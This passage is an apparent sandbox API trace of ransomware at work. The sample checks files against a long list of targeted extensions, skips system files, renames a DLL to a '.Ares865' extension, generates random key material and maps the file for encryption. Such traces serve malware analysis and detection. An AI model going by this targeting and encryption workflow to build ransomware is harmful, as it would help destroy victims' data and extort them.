[0114.915] lstrcmpiW (lpString1="p.dll", lpString2="accdw") returned 1 [0114.915] lstrlenW (lpString="accft") returned 5 [0114.915] lstrcmpiW (lpString1="p.dll", lpString2="accft") returned 1 [0114.915] lstrlenW (lpString="adb") returned 3 [0114.915] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0114.915] lstrlenW (lpString="adb") returned 3 [0114.915] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0114.915] lstrlenW (lpString="ade") returned 3 [0114.915] lstrcmpiW (lpString1="dll", lpString2="ade") returned 1 [0114.915] lstrlenW (lpString="adf") returned 3 [0114.915] lstrcmpiW (lpString1="dll", lpString2="adf") returned 1 [0114.916] lstrlenW (lpString="adn") returned 3 [0114.916] lstrcmpiW (lpString1="dll", lpString2="adn") returned 1 [0114.916] lstrlenW (lpString="adp") returned 3 [0114.916] lstrcmpiW (lpString1="dll", lpString2="adp") returned 1 [0114.916] lstrlenW (lpString="alf") returned 3 [0114.916] lstrcmpiW (lpString1="dll", lpString2="alf") returned 1 [0114.916] lstrlenW (lpString="ask") returned 3 [0114.916] lstrcmpiW (lpString1="dll", lpString2="ask") returned 1 [0114.916] lstrlenW (lpString="btr") returned 3 [0114.916] lstrcmpiW (lpString1="dll", lpString2="btr") returned 1 [0114.916] lstrlenW (lpString="cat") returned 3 [0114.916] lstrcmpiW (lpString1="dll", lpString2="cat") returned 1 [0114.916] lstrlenW (lpString="cdb") returned 3 [0114.916] lstrcmpiW (lpString1="dll", lpString2="cdb") returned 1 [0114.916] lstrlenW (lpString="ckp") returned 3 [0114.916] lstrcmpiW (lpString1="dll", lpString2="ckp") returned 1 [0114.916] lstrlenW (lpString="cma") returned 3 [0114.916] lstrcmpiW (lpString1="dll", lpString2="cma") returned 1 [0114.916] lstrlenW (lpString="cpd") returned 3 [0114.916] lstrcmpiW (lpString1="dll", lpString2="cpd") returned 1 [0114.916] lstrlenW (lpString="dacpac") returned 6 [0114.916] lstrcmpiW (lpString1="op.dll", lpString2="dacpac") returned 1 [0114.916] lstrlenW (lpString="dad") returned 3 [0114.916] lstrcmpiW (lpString1="dll", lpString2="dad") returned 1 [0114.916] lstrlenW (lpString="dadiagrams") returned 10 [0114.916] lstrlenW (lpString="daschema") returned 8 [0114.916] lstrcmpiW (lpString1="drop.dll", lpString2="daschema") returned 1 [0114.916] lstrlenW (lpString="db-journal") returned 10 [0114.916] lstrlenW (lpString="db-shm") returned 6 [0114.916] lstrcmpiW (lpString1="op.dll", lpString2="db-shm") returned 1 [0114.916] lstrlenW (lpString="db-wal") returned 6 [0114.916] lstrcmpiW (lpString1="op.dll", lpString2="db-wal") returned 1 [0114.916] lstrlenW (lpString="dbc") returned 3 [0114.916] lstrcmpiW (lpString1="dll", lpString2="dbc") returned 1 [0114.916] lstrlenW (lpString="dbs") returned 3 [0114.916] lstrcmpiW (lpString1="dll", lpString2="dbs") returned 1 [0114.917] lstrlenW (lpString="dbt") returned 3 [0114.917] lstrcmpiW (lpString1="dll", lpString2="dbt") returned 1 [0114.917] lstrlenW (lpString="dbv") returned 3 [0114.917] lstrcmpiW (lpString1="dll", lpString2="dbv") returned 1 [0114.917] lstrlenW (lpString="dbx") returned 3 [0114.917] lstrcmpiW (lpString1="dll", lpString2="dbx") returned 1 [0114.917] lstrlenW (lpString="dcb") returned 3 [0114.917] lstrcmpiW (lpString1="dll", lpString2="dcb") returned 1 [0114.917] lstrlenW (lpString="dct") returned 3 [0114.917] lstrcmpiW (lpString1="dll", lpString2="dct") returned 1 [0114.917] lstrlenW (lpString="dcx") returned 3 [0114.917] lstrcmpiW (lpString1="dll", lpString2="dcx") returned 1 [0114.917] lstrlenW (lpString="ddl") returned 3 [0114.917] lstrcmpiW (lpString1="dll", lpString2="ddl") returned 1 [0114.917] lstrlenW (lpString="dlis") returned 4 [0114.917] lstrcmpiW (lpString1=".dll", lpString2="dlis") returned -1 [0114.917] lstrlenW (lpString="dp1") returned 3 [0114.917] lstrcmpiW (lpString1="dll", lpString2="dp1") returned -1 [0114.917] lstrlenW (lpString="dqy") returned 3 [0114.917] lstrcmpiW (lpString1="dll", lpString2="dqy") returned -1 [0114.917] lstrlenW (lpString="dsk") returned 3 [0114.917] lstrcmpiW (lpString1="dll", lpString2="dsk") returned -1 [0114.917] lstrlenW (lpString="dsn") returned 3 [0114.917] lstrcmpiW (lpString1="dll", lpString2="dsn") returned -1 [0114.917] lstrlenW (lpString="dtsx") returned 4 [0114.917] lstrcmpiW (lpString1=".dll", lpString2="dtsx") returned -1 [0114.917] lstrlenW (lpString="dxl") returned 3 [0114.917] lstrcmpiW (lpString1="dll", lpString2="dxl") returned -1 [0114.917] lstrlenW (lpString="eco") returned 3 [0114.917] lstrcmpiW (lpString1="dll", lpString2="eco") returned -1 [0114.917] lstrlenW (lpString="ecx") returned 3 [0114.917] lstrcmpiW (lpString1="dll", lpString2="ecx") returned -1 [0114.917] lstrlenW (lpString="edb") returned 3 [0114.917] lstrcmpiW (lpString1="dll", lpString2="edb") returned -1 [0114.917] lstrlenW (lpString="epim") returned 4 [0114.918] lstrcmpiW (lpString1=".dll", lpString2="epim") returned -1 [0114.918] lstrlenW (lpString="fcd") returned 3 [0114.918] lstrcmpiW (lpString1="dll", lpString2="fcd") returned -1 [0114.918] lstrlenW (lpString="fdb") returned 3 [0114.918] lstrcmpiW (lpString1="dll", lpString2="fdb") returned -1 [0114.918] lstrlenW (lpString="fic") returned 3 [0114.918] lstrcmpiW (lpString1="dll", lpString2="fic") returned -1 [0114.918] lstrlenW (lpString="flexolibrary") returned 12 [0114.918] lstrlenW (lpString="fm5") returned 3 [0114.918] lstrcmpiW (lpString1="dll", lpString2="fm5") returned -1 [0114.918] lstrlenW (lpString="fmp") returned 3 [0114.918] lstrcmpiW (lpString1="dll", lpString2="fmp") returned -1 [0114.918] lstrlenW (lpString="fmp12") returned 5 [0114.918] lstrcmpiW (lpString1="p.dll", lpString2="fmp12") returned 1 [0114.918] lstrlenW (lpString="fmpsl") returned 5 [0114.918] lstrcmpiW (lpString1="p.dll", lpString2="fmpsl") returned 1 [0114.918] lstrlenW (lpString="fol") returned 3 [0114.918] lstrcmpiW (lpString1="dll", lpString2="fol") returned -1 [0114.918] lstrlenW (lpString="fp3") returned 3 [0114.918] lstrcmpiW (lpString1="dll", lpString2="fp3") returned -1 [0114.918] lstrlenW (lpString="fp4") returned 3 [0114.918] lstrcmpiW (lpString1="dll", lpString2="fp4") returned -1 [0114.918] lstrlenW (lpString="fp5") returned 3 [0114.918] lstrcmpiW (lpString1="dll", lpString2="fp5") returned -1 [0114.918] lstrlenW (lpString="fp7") returned 3 [0114.918] lstrcmpiW (lpString1="dll", lpString2="fp7") returned -1 [0114.918] lstrlenW (lpString="fpt") returned 3 [0114.918] lstrcmpiW (lpString1="dll", lpString2="fpt") returned -1 [0114.918] lstrlenW (lpString="frm") returned 3 [0114.918] lstrcmpiW (lpString1="dll", lpString2="frm") returned -1 [0114.918] lstrlenW (lpString="gdb") returned 3 [0114.918] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0114.918] lstrlenW (lpString="gdb") returned 3 [0114.918] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0114.919] lstrlenW (lpString="grdb") returned 4 [0114.919] lstrcmpiW (lpString1=".dll", lpString2="grdb") returned -1 [0114.919] lstrlenW (lpString="gwi") returned 3 [0114.919] lstrcmpiW (lpString1="dll", lpString2="gwi") returned -1 [0114.919] lstrlenW (lpString="hdb") returned 3 [0114.919] lstrcmpiW (lpString1="dll", lpString2="hdb") returned -1 [0114.919] lstrlenW (lpString="his") returned 3 [0114.919] lstrcmpiW (lpString1="dll", lpString2="his") returned -1 [0114.919] lstrlenW (lpString="ib") returned 2 [0114.919] lstrcmpiW (lpString1="ll", lpString2="ib") returned 1 [0114.919] lstrlenW (lpString="idb") returned 3 [0114.919] lstrcmpiW (lpString1="dll", lpString2="idb") returned -1 [0114.919] lstrlenW (lpString="ihx") returned 3 [0114.919] lstrcmpiW (lpString1="dll", lpString2="ihx") returned -1 [0114.919] lstrlenW (lpString="itdb") returned 4 [0114.919] lstrcmpiW (lpString1=".dll", lpString2="itdb") returned -1 [0114.919] lstrlenW (lpString="itw") returned 3 [0114.919] lstrcmpiW (lpString1="dll", lpString2="itw") returned -1 [0114.919] lstrlenW (lpString="jet") returned 3 [0114.919] lstrcmpiW (lpString1="dll", lpString2="jet") returned -1 [0114.919] lstrlenW (lpString="jtx") returned 3 [0114.920] lstrcmpiW (lpString1="dll", lpString2="jtx") returned -1 [0114.920] lstrlenW (lpString="kdb") returned 3 [0114.920] lstrcmpiW (lpString1="dll", lpString2="kdb") returned -1 [0114.920] lstrlenW (lpString="kexi") returned 4 [0114.920] lstrcmpiW (lpString1=".dll", lpString2="kexi") returned -1 [0114.920] lstrlenW (lpString="kexic") returned 5 [0114.920] lstrcmpiW (lpString1="p.dll", lpString2="kexic") returned 1 [0114.920] lstrlenW (lpString="kexis") returned 5 [0114.920] lstrcmpiW (lpString1="p.dll", lpString2="kexis") returned 1 [0114.920] lstrlenW (lpString="lgc") returned 3 [0114.920] lstrcmpiW (lpString1="dll", lpString2="lgc") returned -1 [0114.920] lstrlenW (lpString="lwx") returned 3 [0114.920] lstrcmpiW (lpString1="dll", lpString2="lwx") returned -1 [0114.920] lstrlenW (lpString="maf") returned 3 [0114.920] lstrcmpiW (lpString1="dll", lpString2="maf") returned -1 [0114.920] lstrlenW (lpString="maq") returned 3 [0114.920] lstrcmpiW (lpString1="dll", lpString2="maq") returned -1 [0114.920] lstrlenW (lpString="mar") returned 3 [0114.920] lstrcmpiW (lpString1="dll", lpString2="mar") returned -1 [0114.920] lstrlenW (lpString="marshal") returned 7 [0114.920] lstrcmpiW (lpString1="rop.dll", lpString2="marshal") returned 1 [0114.920] lstrlenW (lpString="mas") returned 3 [0114.920] lstrcmpiW (lpString1="dll", lpString2="mas") returned -1 [0114.920] lstrlenW (lpString="mav") returned 3 [0114.920] lstrcmpiW (lpString1="dll", lpString2="mav") returned -1 [0114.920] lstrlenW (lpString="maw") returned 3 [0114.920] lstrcmpiW (lpString1="dll", lpString2="maw") returned -1 [0114.920] lstrlenW (lpString="mdbhtml") returned 7 [0114.920] lstrcmpiW (lpString1="rop.dll", lpString2="mdbhtml") returned 1 [0114.920] lstrlenW (lpString="mdn") returned 3 [0114.920] lstrcmpiW (lpString1="dll", lpString2="mdn") returned -1 [0114.920] lstrlenW (lpString="mdt") returned 3 [0114.920] lstrcmpiW (lpString1="dll", lpString2="mdt") returned -1 [0114.920] lstrlenW (lpString="mfd") returned 3 [0114.920] lstrcmpiW (lpString1="dll", lpString2="mfd") returned -1 [0114.920] lstrlenW (lpString="mpd") returned 3 [0114.921] lstrcmpiW (lpString1="dll", lpString2="mpd") returned -1 [0114.921] lstrlenW (lpString="mrg") returned 3 [0114.921] lstrcmpiW (lpString1="dll", lpString2="mrg") returned -1 [0114.921] lstrlenW (lpString="mud") returned 3 [0114.921] lstrcmpiW (lpString1="dll", lpString2="mud") returned -1 [0114.921] lstrlenW (lpString="mwb") returned 3 [0114.921] lstrcmpiW (lpString1="dll", lpString2="mwb") returned -1 [0114.921] lstrlenW (lpString="myd") returned 3 [0114.921] lstrcmpiW (lpString1="dll", lpString2="myd") returned -1 [0114.921] lstrlenW (lpString="ndf") returned 3 [0114.921] lstrcmpiW (lpString1="dll", lpString2="ndf") returned -1 [0114.921] lstrlenW (lpString="nnt") returned 3 [0114.921] lstrcmpiW (lpString1="dll", lpString2="nnt") returned -1 [0114.921] lstrlenW (lpString="nrmlib") returned 6 [0114.921] lstrcmpiW (lpString1="op.dll", lpString2="nrmlib") returned 1 [0114.921] lstrlenW (lpString="ns2") returned 3 [0114.921] lstrcmpiW (lpString1="dll", lpString2="ns2") returned -1 [0114.921] lstrlenW (lpString="ns3") returned 3 [0114.921] lstrcmpiW (lpString1="dll", lpString2="ns3") returned -1 [0114.921] lstrlenW (lpString="ns4") returned 3 [0114.921] lstrcmpiW (lpString1="dll", lpString2="ns4") returned -1 [0114.921] lstrlenW (lpString="nsf") returned 3 [0114.921] lstrcmpiW (lpString1="dll", lpString2="nsf") returned -1 [0114.921] lstrlenW (lpString="nv") returned 2 [0114.921] lstrcmpiW (lpString1="ll", lpString2="nv") returned -1 [0114.921] lstrlenW (lpString="nv2") returned 3 [0114.921] lstrcmpiW (lpString1="dll", lpString2="nv2") returned -1 [0114.921] lstrlenW (lpString="nwdb") returned 4 [0114.921] lstrcmpiW (lpString1=".dll", lpString2="nwdb") returned -1 [0114.921] lstrlenW (lpString="nyf") returned 3 [0114.921] lstrcmpiW (lpString1="dll", lpString2="nyf") returned -1 [0114.921] lstrlenW (lpString="odb") returned 3 [0114.921] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0114.921] lstrlenW (lpString="odb") returned 3 [0114.922] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0114.922] lstrlenW (lpString="oqy") returned 3 [0114.922] lstrcmpiW (lpString1="dll", lpString2="oqy") returned -1 [0114.922] lstrlenW (lpString="ora") returned 3 [0114.922] lstrcmpiW (lpString1="dll", lpString2="ora") returned -1 [0114.922] lstrlenW (lpString="orx") returned 3 [0114.922] lstrcmpiW (lpString1="dll", lpString2="orx") returned -1 [0114.922] lstrlenW (lpString="owc") returned 3 [0114.922] lstrcmpiW (lpString1="dll", lpString2="owc") returned -1 [0114.922] lstrlenW (lpString="p96") returned 3 [0114.922] lstrcmpiW (lpString1="dll", lpString2="p96") returned -1 [0114.922] lstrlenW (lpString="p97") returned 3 [0114.922] lstrcmpiW (lpString1="dll", lpString2="p97") returned -1 [0114.922] lstrlenW (lpString="pan") returned 3 [0114.922] lstrcmpiW (lpString1="dll", lpString2="pan") returned -1 [0114.922] lstrlenW (lpString="pdb") returned 3 [0114.922] lstrcmpiW (lpString1="dll", lpString2="pdb") returned -1 [0114.922] lstrlenW (lpString="pdm") returned 3 [0114.922] lstrcmpiW (lpString1="dll", lpString2="pdm") returned -1 [0114.922] lstrlenW (lpString="pnz") returned 3 [0114.922] lstrcmpiW (lpString1="dll", lpString2="pnz") returned -1 [0114.922] lstrlenW (lpString="qry") returned 3 [0114.922] lstrcmpiW (lpString1="dll", lpString2="qry") returned -1 [0114.922] lstrlenW (lpString="qvd") returned 3 [0114.922] lstrcmpiW (lpString1="dll", lpString2="qvd") returned -1 [0114.922] lstrlenW (lpString="rbf") returned 3 [0114.922] lstrcmpiW (lpString1="dll", lpString2="rbf") returned -1 [0114.922] lstrlenW (lpString="rctd") returned 4 [0114.922] lstrcmpiW (lpString1=".dll", lpString2="rctd") returned -1 [0114.922] lstrlenW (lpString="rod") returned 3 [0114.922] lstrcmpiW (lpString1="dll", lpString2="rod") returned -1 [0114.922] lstrlenW (lpString="rodx") returned 4 [0114.922] lstrcmpiW (lpString1=".dll", lpString2="rodx") returned -1 [0114.922] lstrlenW (lpString="rpd") returned 3 [0114.923] lstrcmpiW (lpString1="dll", lpString2="rpd") returned -1 [0114.923] lstrlenW (lpString="rsd") returned 3 [0114.923] lstrcmpiW (lpString1="dll", lpString2="rsd") returned -1 [0114.923] lstrlenW (lpString="sas7bdat") returned 8 [0114.923] lstrcmpiW (lpString1="drop.dll", lpString2="sas7bdat") returned -1 [0114.923] lstrlenW (lpString="sbf") returned 3 [0114.923] lstrcmpiW (lpString1="dll", lpString2="sbf") returned -1 [0114.923] lstrlenW (lpString="scx") returned 3 [0114.923] lstrcmpiW (lpString1="dll", lpString2="scx") returned -1 [0114.923] lstrlenW (lpString="sdb") returned 3 [0114.923] lstrcmpiW (lpString1="dll", lpString2="sdb") returned -1 [0114.923] lstrlenW (lpString="sdc") returned 3 [0114.923] lstrcmpiW (lpString1="dll", lpString2="sdc") returned -1 [0114.923] lstrlenW (lpString="sdf") returned 3 [0114.923] lstrcmpiW (lpString1="dll", lpString2="sdf") returned -1 [0114.923] lstrlenW (lpString="sis") returned 3 [0114.923] lstrcmpiW (lpString1="dll", lpString2="sis") returned -1 [0114.923] lstrlenW (lpString="spq") returned 3 [0114.923] lstrcmpiW (lpString1="dll", lpString2="spq") returned -1 [0114.923] lstrlenW (lpString="te") returned 2 [0114.923] lstrcmpiW (lpString1="ll", lpString2="te") returned -1 [0114.923] lstrlenW (lpString="teacher") returned 7 [0114.923] lstrcmpiW (lpString1="rop.dll", lpString2="teacher") returned -1 [0114.923] lstrlenW (lpString="tmd") returned 3 [0114.923] lstrcmpiW (lpString1="dll", lpString2="tmd") returned -1 [0114.923] lstrlenW (lpString="tps") returned 3 [0114.923] lstrcmpiW (lpString1="dll", lpString2="tps") returned -1 [0114.923] lstrlenW (lpString="trc") returned 3 [0114.923] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0114.923] lstrlenW (lpString="trc") returned 3 [0114.923] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0114.923] lstrlenW (lpString="trm") returned 3 [0114.923] lstrcmpiW (lpString1="dll", lpString2="trm") returned -1 [0114.923] lstrlenW (lpString="udb") returned 3 [0114.923] lstrcmpiW (lpString1="dll", lpString2="udb") returned -1 [0114.923] lstrlenW (lpString="udl") returned 3 [0114.924] lstrcmpiW (lpString1="dll", lpString2="udl") returned -1 [0114.924] lstrlenW (lpString="usr") returned 3 [0114.924] lstrcmpiW (lpString1="dll", lpString2="usr") returned -1 [0114.924] lstrlenW (lpString="v12") returned 3 [0114.924] lstrcmpiW (lpString1="dll", lpString2="v12") returned -1 [0114.924] lstrlenW (lpString="vis") returned 3 [0114.924] lstrcmpiW (lpString1="dll", lpString2="vis") returned -1 [0114.924] lstrlenW (lpString="vpd") returned 3 [0114.924] lstrcmpiW (lpString1="dll", lpString2="vpd") returned -1 [0114.924] lstrlenW (lpString="vvv") returned 3 [0114.924] lstrcmpiW (lpString1="dll", lpString2="vvv") returned -1 [0114.924] lstrlenW (lpString="wdb") returned 3 [0114.924] lstrcmpiW (lpString1="dll", lpString2="wdb") returned -1 [0114.924] lstrlenW (lpString="wmdb") returned 4 [0114.924] lstrcmpiW (lpString1=".dll", lpString2="wmdb") returned -1 [0114.924] lstrlenW (lpString="wrk") returned 3 [0114.924] lstrcmpiW (lpString1="dll", lpString2="wrk") returned -1 [0114.924] lstrlenW (lpString="xdb") returned 3 [0114.924] lstrcmpiW (lpString1="dll", lpString2="xdb") returned -1 [0114.924] lstrlenW (lpString="xld") returned 3 [0114.924] lstrcmpiW (lpString1="dll", lpString2="xld") returned -1 [0114.924] lstrlenW (lpString="xmlff") returned 5 [0114.924] lstrcmpiW (lpString1="p.dll", lpString2="xmlff") returned -1 [0114.924] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\sbdrop.dll.Ares865") returned 57 [0114.924] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\sbdrop.dll" (normalized: "c:\\program files (x86)\\windows sidebar\\sbdrop.dll"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\sbdrop.dll.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\sbdrop.dll.ares865"), dwFlags=0x1) returned 1 [0114.926] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\sbdrop.dll.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\sbdrop.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0114.926] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=82944) returned 1 [0114.926] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0114.927] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0114.927] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0114.927] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0114.927] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0114.927] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0114.928] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x14700, lpName=0x0) returned 0x170 [0114.929] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x14700) returned 0x190000 [0114.939] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0114.940] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0114.940] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0114.940] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0114.940] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0114.940] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0114.940] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0114.940] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0114.940] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0114.940] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0114.940] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0114.940] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0114.940] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0114.940] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0114.941] CloseHandle (hObject=0x170) returned 1 [0114.941] CloseHandle (hObject=0x118) returned 1 [0114.941] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0114.941] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0114.941] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0114.942] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81351db4, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7c393c21, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7c393c21, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.ini", cAlternateFileName="")) returned 1 [0114.942] lstrcmpiW (lpString1="settings.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0114.942] lstrcmpiW (lpString1="settings.ini", lpString2="aoldtz.exe") returned 1 [0114.942] lstrcmpiW (lpString1="settings.ini", lpString2=".") returned 1 [0114.942] lstrcmpiW (lpString1="settings.ini", lpString2="..") returned 1 [0114.942] lstrcmpiW (lpString1="settings.ini", lpString2="windows") returned -1 [0114.942] lstrcmpiW (lpString1="settings.ini", lpString2="bootmgr") returned 1 [0114.942] lstrcmpiW (lpString1="settings.ini", lpString2="temp") returned -1 [0114.942] lstrcmpiW (lpString1="settings.ini", lpString2="pagefile.sys") returned 1 [0114.942] lstrcmpiW (lpString1="settings.ini", lpString2="boot") returned 1 [0114.942] lstrcmpiW (lpString1="settings.ini", lpString2="ids.txt") returned 1 [0114.942] lstrcmpiW (lpString1="settings.ini", lpString2="ntuser.dat") returned 1 [0114.942] lstrcmpiW (lpString1="settings.ini", lpString2="perflogs") returned 1 [0114.942] lstrcmpiW (lpString1="settings.ini", lpString2="MSBuild") returned 1 [0114.942] lstrlenW (lpString="settings.ini") returned 12 [0114.942] lstrlenW (lpString="C:\\Program Files (x86)\\Windows Sidebar\\sbdrop.dll") returned 49 [0114.942] lstrcpyW (in: lpString1=0x2cce44e, lpString2="settings.ini" | out: lpString1="settings.ini") returned="settings.ini" [0114.943] lstrlenW (lpString="settings.ini") returned 12 [0114.943] lstrlenW (lpString="Ares865") returned 7 [0114.943] lstrcmpiW (lpString1="ngs.ini", lpString2="Ares865") returned 1 [0114.943] lstrlenW (lpString=".dll") returned 4 [0114.943] lstrcmpiW (lpString1="settings.ini", lpString2=".dll") returned 1 [0114.943] lstrlenW (lpString=".lnk") returned 4 [0114.943] lstrcmpiW (lpString1="settings.ini", lpString2=".lnk") returned 1 [0114.943] lstrlenW (lpString=".ini") returned 4 [0114.943] lstrcmpiW (lpString1="settings.ini", lpString2=".ini") returned 1 [0114.943] lstrlenW (lpString=".sys") returned 4 [0114.943] lstrcmpiW (lpString1="settings.ini", lpString2=".sys") returned 1 [0114.943] lstrlenW (lpString="settings.ini") returned 12 [0114.943] lstrlenW (lpString="bak") returned 3 [0114.943] lstrcmpiW (lpString1="ini", lpString2="bak") returned 1 [0114.943] lstrlenW (lpString="ba_") returned 3 [0114.943] lstrcmpiW (lpString1="ini", lpString2="ba_") returned 1 [0114.943] lstrlenW (lpString="dbb") returned 3 [0114.943] lstrcmpiW (lpString1="ini", lpString2="dbb") returned 1 [0114.943] lstrlenW (lpString="vmdk") returned 4 [0114.943] lstrcmpiW (lpString1=".ini", lpString2="vmdk") returned -1 [0114.943] lstrlenW (lpString="rar") returned 3 [0114.943] lstrcmpiW (lpString1="ini", lpString2="rar") returned -1 [0114.943] lstrlenW (lpString="zip") returned 3 [0114.943] lstrcmpiW (lpString1="ini", lpString2="zip") returned -1 [0114.943] lstrlenW (lpString="tgz") returned 3 [0114.943] lstrcmpiW (lpString1="ini", lpString2="tgz") returned -1 [0114.943] lstrlenW (lpString="vbox") returned 4 [0114.943] lstrcmpiW (lpString1=".ini", lpString2="vbox") returned -1 [0114.943] lstrlenW (lpString="vdi") returned 3 [0114.943] lstrcmpiW (lpString1="ini", lpString2="vdi") returned -1 [0114.943] lstrlenW (lpString="vhd") returned 3 [0114.943] lstrcmpiW (lpString1="ini", lpString2="vhd") returned -1 [0114.943] lstrlenW (lpString="vhdx") returned 4 [0114.943] lstrcmpiW (lpString1=".ini", lpString2="vhdx") returned -1 [0114.943] lstrlenW (lpString="avhd") returned 4 [0114.943] lstrcmpiW (lpString1=".ini", lpString2="avhd") returned -1 [0114.944] lstrlenW (lpString="db") returned 2 [0114.944] lstrcmpiW (lpString1="ni", lpString2="db") returned 1 [0114.944] lstrlenW (lpString="db2") returned 3 [0114.944] lstrcmpiW (lpString1="ini", lpString2="db2") returned 1 [0114.944] lstrlenW (lpString="db3") returned 3 [0114.944] lstrcmpiW (lpString1="ini", lpString2="db3") returned 1 [0114.944] lstrlenW (lpString="dbf") returned 3 [0114.944] lstrcmpiW (lpString1="ini", lpString2="dbf") returned 1 [0114.944] lstrlenW (lpString="mdf") returned 3 [0114.944] lstrcmpiW (lpString1="ini", lpString2="mdf") returned -1 [0114.944] lstrlenW (lpString="mdb") returned 3 [0114.944] lstrcmpiW (lpString1="ini", lpString2="mdb") returned -1 [0114.944] lstrlenW (lpString="sql") returned 3 [0114.944] lstrcmpiW (lpString1="ini", lpString2="sql") returned -1 [0114.944] lstrlenW (lpString="sqlite") returned 6 [0114.944] lstrcmpiW (lpString1="gs.ini", lpString2="sqlite") returned -1 [0114.944] lstrlenW (lpString="sqlite3") returned 7 [0114.944] lstrcmpiW (lpString1="ngs.ini", lpString2="sqlite3") returned -1 [0114.944] lstrlenW (lpString="sqlitedb") returned 8 [0114.944] lstrcmpiW (lpString1="ings.ini", lpString2="sqlitedb") returned -1 [0114.944] lstrlenW (lpString="xml") returned 3 [0114.944] lstrcmpiW (lpString1="ini", lpString2="xml") returned -1 [0114.944] lstrlenW (lpString="$er") returned 3 [0114.944] lstrcmpiW (lpString1="ini", lpString2="$er") returned 1 [0114.944] lstrlenW (lpString="4dd") returned 3 [0114.944] lstrcmpiW (lpString1="ini", lpString2="4dd") returned 1 [0114.944] lstrlenW (lpString="4dl") returned 3 [0114.944] lstrcmpiW (lpString1="ini", lpString2="4dl") returned 1 [0114.944] lstrlenW (lpString="^^^") returned 3 [0114.944] lstrcmpiW (lpString1="ini", lpString2="^^^") returned 1 [0114.944] lstrlenW (lpString="abs") returned 3 [0114.944] lstrcmpiW (lpString1="ini", lpString2="abs") returned 1 [0114.944] lstrlenW (lpString="abx") returned 3 [0114.944] lstrcmpiW (lpString1="ini", lpString2="abx") returned 1 [0114.944] lstrlenW (lpString="accdb") returned 5 [0114.944] lstrcmpiW (lpString1="s.ini", lpString2="accdb") returned 1 [0114.944] lstrlenW (lpString="accdc") returned 5 